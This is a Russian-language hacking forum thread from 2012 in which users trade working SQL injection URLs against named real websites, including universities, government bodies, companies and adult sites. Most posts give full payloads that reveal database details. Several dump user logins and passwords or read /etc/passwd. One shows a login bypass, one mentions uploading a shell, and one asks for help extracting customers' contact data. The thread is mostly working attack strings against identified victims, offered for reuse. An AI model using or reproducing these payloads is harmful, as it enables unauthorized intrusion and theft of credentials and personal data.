ТИЦ: 20
PR: 0
Путеводитель по отелям и гостиницам.
Code:
http://www.hotelstop.ru/opinn1.php?num=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),3--
Вывод в титле.
Database Version: 4.0.27-log
Database name: delinform
User name: delinform@localhost
ТИЦ: 40
PR: 3
Недвижимость Кирова.
Code:
http://www.homekirov.ru/read_news.php?num=1-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9--
Database Version: 5.1.58-log
Database name: cl26429_home
User name: cl26429_home@localhost
ТИЦ: 10
PR: 2
Интернет портал СНГ.
Code:
http://e-cis.info/index.php?id=1+UNION+SELECT+1,2,3,4,CONCAT(Version (),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),6,7,8, 9--
File_Priv = Y
Database Version: 5.0.67-community-nt
Database name: info
User name: ispolkom@localhost
ТИЦ: 40
PR: 5
Сиамский университет.
Code:
http://admission.siam.edu/board/board_topic_detail.php?tid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(Version(), 0x2F2A2A2F,Database(),0x2F2A2A2F,User()),11,12--
Database Version: 5.0.95
Database name: SIAM_ADMISSION
User name: siam_admission@localhost
ТИЦ: 0
PR: 4
Фан-сайт Сталина.
Code:
http://www.stalinproject.com/secondary.php?id_subject=1+UNION+SELECT+1,CONCAT(V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()), 3,4,5,6--
Database Version: 5.0.27-standard
Database name: StalinProject
User name: root@localhost
ТИЦ: 0
PR: 4
ООО "Пермрегионгаз"
Code:
http://www.prg.perm.ru/index.php?Template=NewsDetail&MessageID=1+UNION+SELECT+1,2,3,4,5,6,7,8,CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Database Version: 5.1.42
Database name: prg_prg
User name: prg_prg@localhost
ТИЦ: 20
PR: 3
Интернет-аукцион антиквариата.
Code:
http://www.antikwariat.ru/categories.php?parent_id=2000+UNION+SELECT+1,CONCA T(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( )),3+LIMIT+1,1--
Вывод в титле.
Database Version: 5.1.61
Database name: antikwar
User name: antikwar_user@localhost
ТИЦ: 250
PR: 4
kingbeef
02.07.2012, 13:55
http://www.filmmakersjournal.co.uk/article.php?id=-4+union+select+1,'%3Cscript%3Ealert('XSS')%3C/script%3E',3,4,5,6,7,8,9--+f
Оксфорд
http://festivals.mml.o[google]x.ac.uk/index.php?page=view_single&id=-1+union+select+1,2,(select(@n)from(select(@n:=0x20 ),(select(null)from(festivals.users)where(@n:=conc at(@n,0x3c62723e,username,0x3a,password))))n),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24--+f
Пасивка на оксфорде
http://festivals.mml.ox.ac.uk/index.php?page=view_single&id=-1+union+select+1,2,0x3c7363726970743e616c657274282 93c2f7363726970743e,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24--+f
Га-Ноцри
03.07.2012, 01:53
Астрологический институт Павла Глобы, лол.
ТИЦ == 10, PR == 2;
PHP:
http://globainstitut.ru/index.php?id=-16+union+select+1,2,3,4,5,6,concat_ws(0x03a,login, password),8+from+users--
Вывод в source.
PR == 5;
Cобственно, Oracle. У кого есть желание из спортивного интереса поковыряться - вот наглядный пример. Число колонок подобрано, равно как и выявлено принтабельное поле. Дальше лень
PHP:
http://www.observacoop.org.mx/ActoresListado.php?id_actor=-581+union+select+null,to_char(777),null,null,null, null,null,null,null,null,null,null,null,null,null+ from+sys.dual--
HellFire
03.07.2012, 06:42
Федеральное агентство морского и речного транспорта.
Code:
http://www.morflot.ru/index.php?news_id=1-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT( Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()) ,0x71),0x71),4--
Database Version: 5.0.67
Database name: morflot
User name: root@localhost
ТИЦ: 1200
PR: 6
Международное евразийское движение.
Code:
http://evrazia.info/modules.php?name=News&file=article&sid=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12,13 ,14--
Database Version: 5.1.61
Database name: evrazia
User name: evrazia@web.evrazia.org
ТИЦ: 130
PR: 4
Юридическая компания "Богатовъ и К"
http://www.bogatoff.ru/law_news/?article=-226+uNioN+SeleCt+group_concat(table_name+separator +0x3c62723e)+from+information_schema.tables+where+ table_schema=0x75313730343831+--+
MySQL >5.
Если кто в админку зайдет постучите в личку плиз, мне сосед его по IP нужен.
________________________________________
Заказ и доставка билетов:
http://biletoff.ru/index.php?cat=1056&scheme=-4+uNioN+sElecT+group_concat(table_name+separator+0 x3c62723e)+from+information_schema.tables+where+ta ble_schema=0x75313431313736+--+
MySQL >5, phpinfo: http://biletoff.ru/info.php
Новости
http://www.visitcorvallis.com/index.php?action=events_info&rowid=7260 and 1=convert(numeric,(select max(convert(char,linkurl)||0x3a||convert(char,thed ate)) from yourbuilderlinksn..news))--
unisep
http://www.unisep.edu.br/graduacao.php?id=9 and 1=(select first+1+cast(BAN_NOME+||+BAN_FOTO+as+char(255))+fr om+BANNER)
Га-Ноцри
05.07.2012, 00:47
ТИЦ == 100, PR == 2, ЯK == true, DMOZ == true;
PHP:
http://www.varvara-music.ru/press.html?id=77777+union+select+1,2,3,concat_ws(0 x03a,database(),user(),version()),5,6,7,8,9,10,11, 12--
Любителям хардкора посвящается:
pr=4
cy=10
dmoz=true
http://www.zuerigay.ch/gallery/de/galpicshow.php?id=5572+and+1=0+union+select+1,2,3, concAt_ws%280x3a,user,pw,pval,paid%29,5,6,7,8,9,10 ,11,12,13,14,15,16,17+from+member+limit+0,1+--+
A_n_d_r_e_i
05.07.2012, 04:50
Хардкора говоришь?
http://pornman.ru/onload2.php?p2=-18+union+select+1,2,3,4,5,6,7,8,9,10--
Га-Ноцри
05.07.2012, 05:13
Завязывайте с порно, господа Вот вам вполне симпатичный и интересный сайт, посвященный "киноляпам"
ТИЦ == 150, PR == 5, трафф; юзвери == ~27k;
PHP:
http://www.moviemistakes.com/submission_mistake.php?titleid=-3267+union+select+count(*),2,3,4+from+member--
A_n_d_r_e_i
05.07.2012, 11:12
Code:
http://www.centrodiesel.com.co/html/noticias_det.php?id=-29+union+select+1,group_concat(0x0b,id,0x3a,fecha, 0x3a,hora,0x3a,empresa,0x3a,cargo,0x3a,email,0x3a, telefono,0x3a,ciudad,0x3a,comentario,0x3a,nombre), 3,4,5+from+goblesei_mail.formualrio_web--
filmmakersjournal
http://www.filmmakersjournal.co.uk/article.php?id=-12 union select 1,concat_ws(0x3a,version(),database(),user())
,3,4,5,6,7,8,9 --
logosfor
http://www.logosfor.com.br/orcamento.php?_edtOs=1 and+1=(select+first+1+skip+1+distinct+CLI_FONE+fro m+ORCAMENTO)
aydin-ka
06.07.2012, 17:08
PR 8
PHP:
http://www.bsun.org/?web=bsun&task=-1%27+union+select+1,2,@@version,4,5,6,7,8--+
kalashonokk
06.07.2012, 21:42
http://www.cscl.ru/news_cats.php?cat_id=1'
Пожалуйста, помогите дальше раскрутить
kingbeef
07.07.2012, 14:18
.edu
Тиц 1800
PR 8
PHP:
http://lwlimages.library.yale.edu/strawberryhill/oneitem.asp?id=-1'%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('shprov ','shplocation','test_DISTINCT_IDs','Biography','t est_MERGED','test_SINGLE_ID','shmain','this_SET',' shobjectsfull','z_creatortemp','shobjectsfull(bak) ','shfull','shobjectsmain','shcategory','shcreator ','shmaterials','shrole','shtechnique','shobjectsm ain(bak)'))--
дальше устал))
kingbeef
07.07.2012, 15:55
Кембриджский университет
Тиц 1900
PR 9
PHP:
http://www.lib.cam.ac.uk/exhibitions/KJV/codex.php?id=-1+union+select+11111111,22222222,333333333,4444444 ,555555555--+f
Вывод в исходном коде на 72 строке
PHP:
http://www.lib.cam.ac.uk/exhibitions/KJV/codex.php?id=-1+union+select+11111111,22222222,333333333,version (),555555555--+f
4.1.22-log
PHP:
http://www.divinity.cam.ac.uk/index.php?option=com_mifaq&view=category&id=-1+union+select+1,2,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),4--+f
File_Priv=Y
tomax
http://www.tomax.bg/details.php?id=16639 and 1=(select first+1+skip+4+distinct+rdb$field_name+from+rdb$re lation_fields where rdb$relation_name=(select first+1+skip+9+distinct+rdb$relation_name+from+rdb $relations))
http://morewords.ru/page.php?id=33&newid=-5251+union+select+1,2,3,user%28%29,5--
morewo_liva@localhost
Code:
http://www.jaagle.com/cat.php?id=-44%27+union+select+1,2,3,4,5,user%28%29,7,8,9,10+--+
java4less_jaagle@localhost
PR: 3
Code:
http://www.gordonsmithguitars.com/products/category.php?id=-1+union+select+1,user%28%29,3,4,5--
db82147_test@72.47.224.12
PR: 3
Code:
c/category.php?id=-26+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18--
root@localhost
PR: 4
http://www.shampoor.ru/images/logo.png
Code:
http://www.shampoor.ru/index.php?categoryID=-40+union+select+1,user%28%29,3,4,5,6,7,8,9,10--
shampoor@fe119.hc.ru
ГЕОЛОГО - ГЕОФИЗИЧЕСКИЙ ФАКУЛЬТЕТ
http://www.ggd.nsu.ru/Crystal/asp/Crystal.php?Code=29 and 1=(select first+1+skip+3+distinct+ALFA || BETA+from+MINERALS)
winstrool
09.07.2012, 17:18
Очередная партия скулей))
http://leshiygame.ru/view_cat.php?cat=5'+and+1=0+union+select+1,(select (@x)from(select(@x:=0x00),(select(0)from(informati on_schema.columns)where(table_schema!=0x696e666f72 6d6174696f6e5f736368656d61)and(0x00)in(@x:=concat( @x,0x3c62723e,table_schema,0x2e,table_name,0x3a,co lumn_name))))x),3,4+--+
http://www.ysu.ru/library/view_date.php?date=2010-12'+and+1=0+union+select+1,2,(select(@x)from(selec t(@x:=0x00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f 736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e, table_schema,0x2e,table_name,0x3a,column_name))))x ),database(),database(),6,7,8,9+--+
http://egorch.ru/view_date.php?date=2010-03'+and+1=0+union+select+1,2,(select(@x)from(selec t(@x:=0x00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f 736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e, table_schema,0x2e,table_name,0x3a,column_name))))x ),4,5,6,7,8,9+--+
http://pure-spirit.ru/view_date.php?date=2012-04'+and+1=0+union+select+1,2,version(),4,5,6,(sele ct(@x)from(select(@x:=0x00),(select(0)from(informa tion_schema.columns)where(table_schema!=0x696e666f 726d6174696f6e5f736368656d61)and(0x00)in(@x:=conca t(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a, column_name))))x),8,9,0,11+--+
http://www.aromline.ru/index.php?type=-0+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+ 2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+con cat_ws(0x3a,user(),version(),database())),1,63)+,+ FLOOR(RAND(0)*2)))+--+&productID=4907'f
http://beautyabroad.com/constant/lady.php?id=-163+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),ve rsion(),database()),25,26,27,28
http://www.disney.ru/games/play/?genre=12+and+1=0+union+select+1,table_name,3,4+fr om+information_schema.tables+where+table_name+not+ in+('user_rating','user_play','genre','gamesuser', 'game2genre','game_rating','game_play','game','ava tar')+--+()
http://www.watchanime.su/genre.php?id=3+and+1=0+union+select+concat_ws(0x3a ,user(),version(),database())+--+
EDU
Не много .edu
http://ase.tufts.edu/cosmos/print_images.asp?id=-1+union+all+select+1,2,3,4,5,6,7,8,9+from+MSysAcce ssObjects
PR - 6 CY 80
http://www.mcp.ucla.edu/auction_bid.php?id=-1+union+all+select+1,2,3,4,5,6,7--+
PR - 4 CY 0
http://anthropology.si.edu/olmec/cfml/site_images/DigSiteImages_Detail.cfm?ID=-1+union+all+select+null,null,null,null,null,null,@ @version,null,null,null--+
PR - 6 CY 30
http://sysbio.unl.edu/AthTF/Ara_TF_families.php?ID=-1+union+all+select+1,2,3,load_file(0x2f6574632f706 173737764),5,6,7--+
PR 2 CY 0
daily5remodel
http://www.daily5remodel.com/index.php?action=article&rowid=16 or 1=convert(numeric, (select+max(password||0x3a||fname)+from+users) )
Га-Ноцри
10.07.2012, 02:20
Adult web design.
18+, ибо присутствуют голые тётки (Есть немного траффа)
PHP:
http://cremzinc.com/site.php?recordID=-8+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9--
Просто унылый сайт, через который была надежда добраться до интересующего "соседа".
PHP:
http://auto.kzd.ru/?pid=-4+uNioN+SeleCT+1,2,concat_ws(0x03a,database(),user (),version()) --
ledonnedelvino
http://www.ledonnedelvino.com/delegazioni-regionali.php?regione=Piemonte&start=0&id=-368 union select concat_ws(0x3a,version(),database(),user()),2 --
nemaniak
11.07.2012, 16:06
lermitagehotel.ee PR-5 ТИЦ-500
Code:
www.lermitagehotel.ee/index.php?pageid=244+and+(select+1+from(select+cou nt(*),concat((select+concat_ws(0x3a,version(),user (),database())),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)--
Code:
5.1.49:lermitage@localhost:lermitage1
hillbss.com PR-5
Code:
www.hillbss.com/index.php?pageid=ClassDetail&classid=-63+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13--
Code:
5.1.53-log:urbss@apache2-xenon.conakry.dreamhost.com:urbss2011
kingbeef
11.07.2012, 18:13
Пачка EDU
Тиц 1800
Пр 8
PHP:
http://www.son.washington.edu/departments/pch/faculty_bio.asp?id=-1'+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35--+f
PHP:
http://biology.burke.washington.edu/conus/videos/MovieWindow.php?ID=1+and(select+1+from(select+coun t(*),concat((select+version()),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--+g
Тиц 210
Пр 7
PHP:
http://special.library.louisville.edu/display-collection.asp?ID=-1+union+select+1,2,3,4,5,6+from+MSysAccessObjects
Тиц 700
пр 8
PHP:
http://biology.brown.edu/departments/?id=1+union+select+1,2,version(),4,5,6,7,8,9,10--+f
Тиц 1300
Пр 8
PHP:
http://www.math.indiana.edu/seminars/seminar.phtml?id=-1+union+select+load_file(0x2f6574632f706173737764) ,2,3,4,5,6,7--+f&all=1
Тиц 1200
Пр 8
PHP:
http://healthware.ucsd.edu/public/view/id/1-9999.9)+union+select+1111111,22222222,(select(@x)f rom(select(@x:=0x00),(select(null)from(information _schema.columns)where(table_schema!=0x696e666f726d 6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x ,0x3c62723e,table_schema,0x2e,table_name,0x3a,colu mn_name))))x),4444444444,55555555,666666666,777777 77777,888888888,99999999,10,11--+f
PRosTo_LEva
11.07.2012, 22:38
Тиц 30
Code:
http://semargl.net.ua/photo/indexex.php?id_parent=1+union+select+version()--
chumlung
http://www.chumlung.org.np/news_detail.php?id=-2 union select 1,2,3,concat_ws(0x3a,Password,Email),5 from users--
Га-Ноцри
12.07.2012, 22:47
PR ==6;
PHP:
http://www.benyagoda.com/show-story.php?id=-102+union+select+1,2,convert(version()+using+latin 1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26 --
PR == 4, DMOZ == true;
PHP:
http://www.vov.com/ichoose/story.php?id=-2+union+select+1,concat_ws(0x03a,username_usr,pass word_usr,email_usr),3,4,5+from+cms_user_usr --
PR == 4; вывод в
PHP:
http://www.njar.com/story.php?id=-228+union+select+1,2,concat_ws(0x03a,database(),us er(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18 --
Корпоративное издание
ООО «Пермская финансово-производственная группа»
PHP:
http://pfp-gazeta.pfpg.ru/articles?rub=-1+union+select+1,2,3,4,5,6,7#
Shell отлично льется через администраторскую панель. Кстати, админка по дефолтному адресу:/admin
HellFire
14.07.2012, 11:34
Самарская государственная сельскохозяйственная академия.
Code:
http://www.ssaa.ru/index.php?news=1488-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12--
Database Version: 5.5.25-cll
Database name: ssaa
User name: webadmin@localhost
ТИЦ: 475
PR: 5
www.minimaks.ru
www.minimaks.ru
Тиц 1000
Логины
яhttp://www.minimaks.ru/?a=-1'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING( group_concat(login),1,31))from(tbl_users)))))and(1 )='1
Пароли
яhttp://www.minimaks.ru/?a=-1'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING( group_concat(pwd),1,31))from(tbl_users)))))and(1)= '1
ПР=3, в базе ~7k юзеров
http://www.wired2fire.co.uk/build.php?systype=2&fsb=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11+--
Магазинчик околовоенной тематики, а точнее вроде как снайперских прицелов =)
Site: www.trijicon.com
Inject:
Code:
_ttp://www.trijicon.com/na_en/products/product1.php?id=ACOG'/**/and/**/substring((@@version),1,1)='5
Info:
DB= iwt_trijicon
MySQL >5
UsersPath wt_trijicon->users->user_login|user_password|user_email
TYC = 40
PR = 4
На этом вроде бы всё, но на сайте есть куча параметров которые не фильтруются, и тогда я проверил свою догадку...
_ttps://www.trijicon.com/na_en/login.php
Email= ' or 1='1
Password = ' or 1='1
В яблочко =) (как раз в тему снайперских прицелов)
kingbeef
15.07.2012, 00:27
PR9
Тиц 800
PR 9
PHP:
http://groups.csail.mit.edu/locomotion/lrcc/robot.cgi?id=-1+union+select+1,(select(@x)from(select(@x:=0x00), (select(null)from(information_schema.columns)where (table_schema!=0x696e666f726d6174696f6e5f736368656 d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sch ema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6--+f
Тиц 950
PR 8
PHP:
http://brainatlas.msu.edu/databases/msusection/details.php?id=-1+union+select+1,(select(@x)from(select(@x:=0x00), (select(null)from(information_schema.columns)where (table_schema!=0x696e666f726d6174696f6e5f736368656 d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sch ema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+f
Тиц 140
PR 7
PHP:
http://java.fmcc.suny.edu/~fyunker/player.php?listname=rock&id=23&orderid=23+union+select+1,2,3,(select(@x)from(sele ct(@x:=0x00),(select(null)from(information_schema. columns)where(table_schema!=0x696e666f726d6174696f 6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c627 23e,table_schema,0x2e,table_name,0x3a,column_name) )))x),5,6,7,8--+g
Тиц 110
PR 7
PHP:
http://lowcountrydigital.library.cofc.edu/web/browse/type/results.php?sort=title&id=1&alpha=S'+and(select+1+from(select+count(*),concat( (select+table_name+from+information_schema.tables+ limit+0,1),floor(rand(0)*2))x+from+information_sch ema.tables+group+by+x)a)--+g
Тиц 500
PR 7
PHP:
http://cs.gmu.edu/~jpsousa/bibadmin/show.php?id=-1'+union+select+1,2,(select(@n)from(select(@n:=0x2 0),(select(null)from(jpsousa_papers.bib_user)where (@n:=concat(@n,0x3c62723e,id,0x3a,user,0x3a,pass)) ))n),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45--+f&type=bib
HellFire
15.07.2012, 12:41
Новостройки в Подмосковье.
Code:
http://www.iase.caravan.ru/dom-kvartira.php?unit=&group=&group2=1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User())--
Database Version: 5.0.45
Database name: iase
User name: iase@localhost
ТИЦ: 0
PR: 2
MSSQL POST SQLi в параметре 'inputString'
URL:http://www.cotizalia.com/include/redicabecera.asp
Яндекс тИЦ: 10
Google Page Rank: 5/10
inputString=1' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(99)+CHAR(104)+CHAR(122)+CHAR(58)+CHA R(66)+CHAR(105)+CHAR(85)+CHAR(108)+CHAR(87)+CHAR(8 5)+CHAR(73)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(58) +CHAR(97)+CHAR(112)+CHAR(114)+CHAR(58)--
Сайт по созданию сайтов Студия Алексея Романова
Таблицы
http://site-your.ru/section.php?id=-7+Union+selecT+1,table_name,3,table_name,5,6,7,8,9 +from+information_schema.tables+limit+91,1--+
Колонки
http://site-your.ru/section.php?id=-7+Union+selecT+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=%27b_blo g_user2blog%27+limit+0,1--+
automatic
19.07.2012, 03:57
Секси
http://www.babestare.com/index.php?type=2+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6--
5.1.63-cll:aiwebtoo_cremz@localhost:aiwebtoo_cremzinc
PR=4
По запросу "sex movies" - 3 место в выдаче.
База ~43к юзеров, не хешированные пассы, приличный траф.
http://www.twilightsex[dot]com/action.php?action=download_movie&id=-304715'+AND+extractvalue(1,concat(0x3a,(SELECT+pas sword+from+users+limit+0,1)))+--+
погимморился с фильтрами, но обошел
http://meetmrkt.com/index.php?page=gallery&id=33+/*!and+1*/=2+union%23%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,user%28%2 9,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63+from+dt_members+--+
MySQL: GET SQLi, параметр 'mode' в URL:http://www.sunporno.com/login.php
Яндекс тИЦ (CY): 10
Google PageRank (PR): 4/10
http://www.sunporno.com/login.php?mode=-6337%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C %20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6d76 793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%2C0x3a73716d3a%29%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%23
VERSION()
5.5.23-log
USER()
sunporno_db@192.168.1.3
DATABASE()
sunporno_db
Еще одна порнушка (тот же вектор)
MySQL: GET SQLi, параметр 'mode' в URL:http://www.ah-me.com/channels.php
Яндекс тИЦ (CY): 0
Google PageRank (PR): 3/10
http://www.ah-me.com/channels.php?mode=-6337%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C %20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6d76 793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%2C0x3a73716d3a%29%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%23
MySQL: Error-based Duplicate entry GET SQLi в URL:http://piluli.ru/
Яндекс тИЦ (CY): 600
Google PageRank (PR): 4/10
сложная кэш скуля, вместо [random_string] любые символы, с каждым запросом новые
http://piluli.ru/?[random_string]'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/concat(admin_email_address,';',admin_password)/**/from/**/admin/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
MySQL: GET SQLi параметр 'letter' в URL:http://www.classes.ru/all-spanish/
Яндекс тИЦ (CY): 475
Google PageRank (PR): 2/10
http://www.classes.ru/all-spanish/?letter=1%27%20LIMIT%201%2C1%20UNION%20ALL%20SELEC T%20NULL%2C%20CONCAT%280x3a7078683a%2CIFNULL%28CAS T%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a7 16f6d3a%29%23
PR: 6
Code:
http://www.mofa.gov.bd/lbr/ViewLBR.php?txtUserId=-Canberra%27+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17+--+
Паки
http://www.smeda.org.pk/main.php?id=-2 union select 1,(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7--
Га-Ноцри
24.07.2012, 01:57
PR == 4;
PHP:
http://wap.indosat.com/produk_detail.php?i=-1+union+select+1,file_priv,3,4,5,6,7,8,9,10,11+fro m+mysql.user--
ТИЦ == 10, PR == 1;
PHP:
http://www.debilz.com/index.phtml?id=-352+union+select+concat_ws(0x03a,id,Login,Password ),2,3+from+accounts--
PR == 2;
PHP:
http://sante.ismat.ch/article.php?id=-50+union+select+0,1,load_file('/etc/passwd'),3,4,5,6--
http://sante.ismat.ch/phpinfo.php в помощь.
iamsynergy
http://www.iamsynergy.com/trainers.php?id=-12 union select 1,2,(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8, 9,0,1,12 --
Тиц 425
ПР 8
http://sippi.aaas.org/ipissues/categories/?id=-1+union+select+null,usename||chr(58)||passwd||chr( 58)||usesysid+from+pg_user--
Кликеры
http://www.clicinfo.org/clicinfo-canton.php?idactu=-10059 union select 1,2,3,4,5,6,7,(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x2e,column_name))))x)
,9,0,1,2,3,4,5,6,7,8,9--
Га-Ноцри
26.07.2012, 03:21
ТИЦ == 30, PR == 5, DMOZ == true;
PHP:
http://www.thework.com/watch.php?yid=WsPAY_kpN8c&cat=ololo'+/*!union+all+select+1,2,3,4,load_file('/var/www/html/thework/robots.txt'),6,7,8,9,10,11,12,13,14,15,16,17*/--+h
Code:
http://dimdramteatr.ru/news_view.php?id=-12+union+select+1,concat%28user%28%29,0x3a,databas e%28%29%29,3,4,5--
dimdramteatr_ddt@localhost:dimdramteatr_ddt
Official Website for Larnaka & Pafos International Airports / PR: 5 / тИЦ:50
Code:
http://www.cyprusairports.com.cy/showpage.php?PageID=198+union+select+1,2,concat_ws (0x3a,version(),database(),user()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18--+m
version: 5.0.96-0ubuntu3-log
database: db_hermes
user: db_h3rme5_air
Simpliest
28.07.2012, 01:24
Что-то никак не получается реализовать SQL
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname=lemke'+and+1=1+union+select+1--+m
Спасибо!
MySQL: POST SQLi in param 'province_id' in URL:http://adoos.com/l/car
Яндекс тИЦ (CY): 10
Google PageRank (PR): 4/10
Траффик Alexa: +0.08% (4 000 000 уников в день)
Code:
province_id=1' UNION ALL SELECT VERSION()#
в базах юзеров пароли в Plain text
http://www.salavat-tur.ru/imgs/logo_ru.gif
http://www.salavat-tur.ru/salavat/?part=news&news_id=-15%20and%201=2%20union%20select%201,2,3,concat_ws( char(58),@@version,user(),database(),@@version_com pile_os),5+--
5.1.41-log salavat-tu_mysql@10.1.242.254 salavat_tu_db portbld-freebsd7.2
LiRvD082
31.07.2012, 09:47
http://www.keyshop.us/Product_list.php?cid=-97+UNION+SELECT+1999,@@version,3999,4999,5999,6999 ,9997,8999,9999--+
http://www.tie4safe.com/product.php?pid=271+UNION+SELECT+table_name,2999,3 999,9999,5999,6999,7999,8999,9999,19990+from+INFOR MATION_SCHEMA.TABLES+limit+117,1--+
http://www.kubachi-kknp.ru/text.html?id=-2+union+select+concat_ws%280x3a,version%28%29,data base%28%29,user%28%29%29--
5.0.77:kknp:kknp_dbu@localhost
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
lexus5122
02.08.2012, 14:30
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
lexus5122 said:
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
